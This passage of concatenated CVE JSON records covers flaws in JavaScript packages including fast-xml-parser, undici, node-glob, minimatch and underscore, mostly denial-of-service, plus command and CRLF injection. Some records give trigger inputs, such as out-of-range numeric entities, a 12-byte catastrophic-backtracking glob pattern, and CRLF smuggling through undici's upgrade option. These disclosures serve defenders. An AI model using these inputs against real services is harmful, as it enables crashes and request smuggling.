          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fast-xml-parser",
          "vendor": "NaturalIntelligence",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.9, \u003c= 5.3.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 5.0.9 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `\u0026#9999999;` or `\u0026#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248: Uncaught Exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-11T18:38:40.192Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-37qj-frw5-hhjh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-37qj-frw5-hhjh"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/4e387f61c4a5cef792f6a2f42467013290bf95dc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/4e387f61c4a5cef792f6a2f42467013290bf95dc"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.4"
        }
      ],
      "source": {
        "advisory": "GHSA-37qj-frw5-hhjh",
        "discovery": "UNKNOWN"
      },
      "title": "fast-xml-parser has RangeError DoS Numeric Entities Bug"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25128",
    "datePublished": "2026-01-30T15:14:58.244Z",
    "dateReserved": "2026-01-29T14:03:42.540Z",
    "dateUpdated": "2026-02-11T18:38:40.192Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-1528",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T13:03:59.738320Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T13:04:57.048Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/nodejs/undici/",
          "defaultStatus": "unaffected",
          "packageName": "undici",
          "product": "undici",
          "repo": "https://github.com/nodejs/undici/",
          "vendor": "undici",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 6.0.0 \u003c 6.24.0; 7.0.0 \u003c 7.24.0"
            },
            {
              "status": "unaffected",
              "version": "6.24.0: 7.24.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "Matteo Collina"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Ulises Gasc\u00f3n"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ch3\u003e\u003cspan\u003eImpact\u003c/span\u003e\u003c/h3\u003e\u003cp\u003eA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici\u0027s ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.\u003cbr\u003e\u003cbr\u003e\u003cb\u003ePatches\u003cbr\u003e\u003c/b\u003e\u003cbr\u003ePatched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\u003cbr\u003e\u003c/p\u003e\u003cbr\u003e"
            }
          ],
          "value": "ImpactA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici\u0027s ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.\n\nPatches\n\nPatched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248 Uncaught exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1284",
              "description": "CWE-1284 Improper validation of specified quantity in input",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T20:21:57.775Z",
        "orgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "shortName": "openjs"
      },
      "references": [
        {
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"
        },
        {
          "url": "https://hackerone.com/reports/3537648"
        },
        {
          "url": "https://cna.openjsf.org/security-advisories.html"
        }
      ],
      "source": {
        "advisory": "GHSA-f269-vfmq-vjvj",
        "discovery": "UNKNOWN"
      },
      "title": "undici is vulnerable to Malicious WebSocket 64-bit length overflows undici parser and crashes the client",
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "assignerShortName": "openjs",
    "cveId": "CVE-2026-1528",
    "datePublished": "2026-03-12T20:21:57.775Z",
    "dateReserved": "2026-01-28T12:05:10.024Z",
    "dateUpdated": "2026-03-13T13:04:57.048Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-64756",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-11-17T18:24:55.363466Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-11-18T16:37:11.917Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "node-glob",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 10.2.0, \u003c 10.5.0"
            },
            {
              "status": "affected",
              "version": "\u003e= 11.0.0, \u003c 11.1.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-11-19T02:30:44.520Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
        },
        {
          "name": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
        },
        {
          "name": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
        }
      ],
      "source": {
        "advisory": "GHSA-5j98-mcp5-4vw2",
        "discovery": "UNKNOWN"
      },
      "title": "glob CLI: Command injection via -c/--cmd executes matches with shell:true"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-64756",
    "datePublished": "2025-11-17T17:29:08.029Z",
    "dateReserved": "2025-11-10T22:29:34.874Z",
    "dateUpdated": "2025-11-19T02:30:44.520Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27904",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-26T19:21:18.964387Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-26T19:21:39.006Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "minimatch",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 10.0.0, \u003c 10.2.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 9.0.0, \u003c 9.0.7"
            },
            {
              "status": "affected",
              "version": "\u003e= 8.0.0, \u003c 8.0.6"
            },
            {
              "status": "affected",
              "version": "\u003e= 7.0.0, \u003c 7.4.8"
            },
            {
              "status": "affected",
              "version": "\u003e= 6.0.0, \u003c 6.2.2"
            },
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.1.8"
            },
            {
              "status": "affected",
              "version": "\u003e= 4.0.0, \u003c 4.2.5"
            },
            {
              "status": "affected",
              "version": "\u003c 3.1.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "CWE-1333: Inefficient Regular Expression Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-26T01:07:42.693Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
        }
      ],
      "source": {
        "advisory": "GHSA-23c5-xmqv-rm74",
        "discovery": "UNKNOWN"
      },
      "title": "minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27904",
    "datePublished": "2026-02-26T01:07:42.693Z",
    "dateReserved": "2026-02-24T15:19:29.718Z",
    "dateUpdated": "2026-02-26T19:21:39.006Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2581",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T18:04:49.981133Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T18:04:58.799Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/nodejs/undici/",
          "defaultStatus": "unaffected",
          "packageName": "undici",
          "product": "undici",
          "repo": "https://github.com/nodejs/undici/",
          "vendor": "undici",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.24.0; 7.0.0 \u003c 7.24.0"
            },
            {
              "status": "unaffected",
              "version": "6.24.0: 7.24.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Matteo Collina"
        },
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "Ulises Gasc\u00f3n"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "Adnan Jakati"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\u003c/p\u003e\u003cp\u003eIn vulnerable Undici versions, when\u0026nbsp;\u003ccode\u003einterceptors.deduplicate()\u003c/code\u003e\u0026nbsp;is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\u003c/p\u003e\u003cp\u003eImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\u003c/p\u003e\u003ch2\u003ePatches\u003c/h2\u003e\u003cp\u003eThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\u003c/p\u003e\u003cp\u003eUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\u003c/p\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e"
            }
          ],
          "value": "This is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when\u00a0interceptors.deduplicate()\u00a0is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\nPatchesThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770 Allocation of resources without limits or throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T20:13:19.571Z",
        "orgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "shortName": "openjs"
      },
      "references": [
        {
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h"
        },
        {
          "url": "https://hackerone.com/reports/3513473"
        },
        {
          "url": "https://cna.openjsf.org/security-advisories.html"
        }
      ],
      "source": {
        "advisory": "GHSA-phc3-fgpg-7m6h",
        "discovery": "EXTERNAL"
      },
      "title": "undici is vulnerable to Unbounded Memory Consumption in in Undici\u0027s DeduplicationHandler via Response Buffering leads to DoS",
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "assignerShortName": "openjs",
    "cveId": "CVE-2026-2581",
    "datePublished": "2026-03-12T20:13:19.571Z",
    "dateReserved": "2026-02-16T12:07:35.310Z",
    "dateUpdated": "2026-03-13T18:04:58.799Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-1527",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T18:05:24.550959Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T18:06:03.794Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/nodejs/undici/",
          "defaultStatus": "unaffected",
          "packageName": "undici",
          "product": "undici",
          "repo": "https://github.com/nodejs/undici/",
          "vendor": "undici",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.24.0; 7.0.0 \u003c 7.24.0"
            },
            {
              "status": "unaffected",
              "version": "6.24.0: 7.24.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Matteo Collina"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Ulises Gasc\u00f3n"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Raul Vega del Valle"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ch3\u003eImpact\u003c/h3\u003e\u003cp\u003eWhen an application passes user-controlled input to the\u0026nbsp;\u003ccode\u003eupgrade\u003c/code\u003e\u0026nbsp;option of\u0026nbsp;\u003ccode\u003eclient.request()\u003c/code\u003e, an attacker can inject CRLF sequences (\u003ccode\u003e\\r\\n\u003c/code\u003e) to:\u003c/p\u003e\u003col\u003e\u003cli\u003eInject arbitrary HTTP headers\u003c/li\u003e\u003cli\u003eTerminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eThe vulnerability exists because undici writes the\u0026nbsp;\u003ccode\u003eupgrade\u003c/code\u003e\u0026nbsp;value directly to the socket without validating for invalid header characters:\u003c/p\u003e\u003cdiv\u003e\u003cpre\u003e// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n  header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\u003c/pre\u003e\u003c/div\u003e"
            }
          ],
          "value": "ImpactWhen an application passes user-controlled input to the\u00a0upgrade\u00a0option of\u00a0client.request(), an attacker can inject CRLF sequences (\\r\\n) to:\n\n  *  Inject arbitrary HTTP headers\n  *  Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\nThe vulnerability exists because undici writes the\u00a0upgrade\u00a0value directly to the socket without validating for invalid header characters:\n\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n  header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-93",
              "description": "CWE-93 Improper neutralization of CRLF sequences (\u0027CRLF injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T20:17:18.984Z",
        "orgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "shortName": "openjs"
      },
      "references": [
        {
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq"
        },
        {
          "url": "https://hackerone.com/reports/3487198"
        },
        {
          "url": "https://cna.openjsf.org/security-advisories.html"
        }
      ],
      "source": {
        "advisory": "GHSA-4992-7rv2-5pvq",
        "discovery": "EXTERNAL"
      },
      "title": "undici is vulnerable to CRLF Injection via upgrade option",
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "assignerShortName": "openjs",
    "cveId": "CVE-2026-1527",
    "datePublished": "2026-03-12T20:17:18.984Z",
    "dateReserved": "2026-01-28T12:05:08.491Z",
    "dateUpdated": "2026-03-13T18:06:03.794Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27601",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-04T16:44:25.481747Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-04T16:44:40.856Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "underscore",
          "vendor": "jashkenas",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.13.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Underscore.js is a utility-belt library for JavaScript. Prior to 1.13.8, the _.flatten and _.isEqual functions use recursion without a depth limit. Under very specific conditions, detailed below, an attacker could exploit this in a Denial of Service (DoS) attack by triggering a stack overflow. Untrusted input must be used to create a recursive datastructure, for example using JSON.parse, with no enforced depth limit. The datastructure thus created must be passed to _.flatten or _.isEqual. In the case of _.flatten, the vulnerability can only be exploited if it is possible for a remote client to prepare a datastructure that consists of arrays at all levels AND if no finite depth limit is passed as the second argument to _.flatten. In the case of _.isEqual, the vulnerability can only be exploited if there exists a code path in which two distinct datastructures that were submitted by the same remote client are compared using _.isEqual. For example, if a client submits data that are stored in a database, and the same client can later submit another datastructure that is then compared to the data that were saved in the database previously, OR if a client submits a single request, but its data are parsed twice, creating two non-identical but equivalent datastructures that are then compared. Exceptions originating from the call to _.flatten or _.isEqual, as a result of a stack overflow, are not being caught. This vulnerability is fixed in 1.13.8."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-03T22:38:38.955Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw"
        },
        {
          "name": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4"
        },
        {
          "name": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84"
        }
      ],
      "source": {
        "advisory": "GHSA-qpx9-hpmf-5gmw",
        "discovery": "UNKNOWN"
      },
      "title": "Underscore.js has unlimited recursion in _.flatten and _.isEqual, potential for DoS attack"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27601",
    "datePublished": "2026-03-03T22:38:38.955Z",
    "dateReserved": "2026-02-20T19:43:14.602Z",
    "dateUpdated": "2026-03-04T16:44:40.856Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
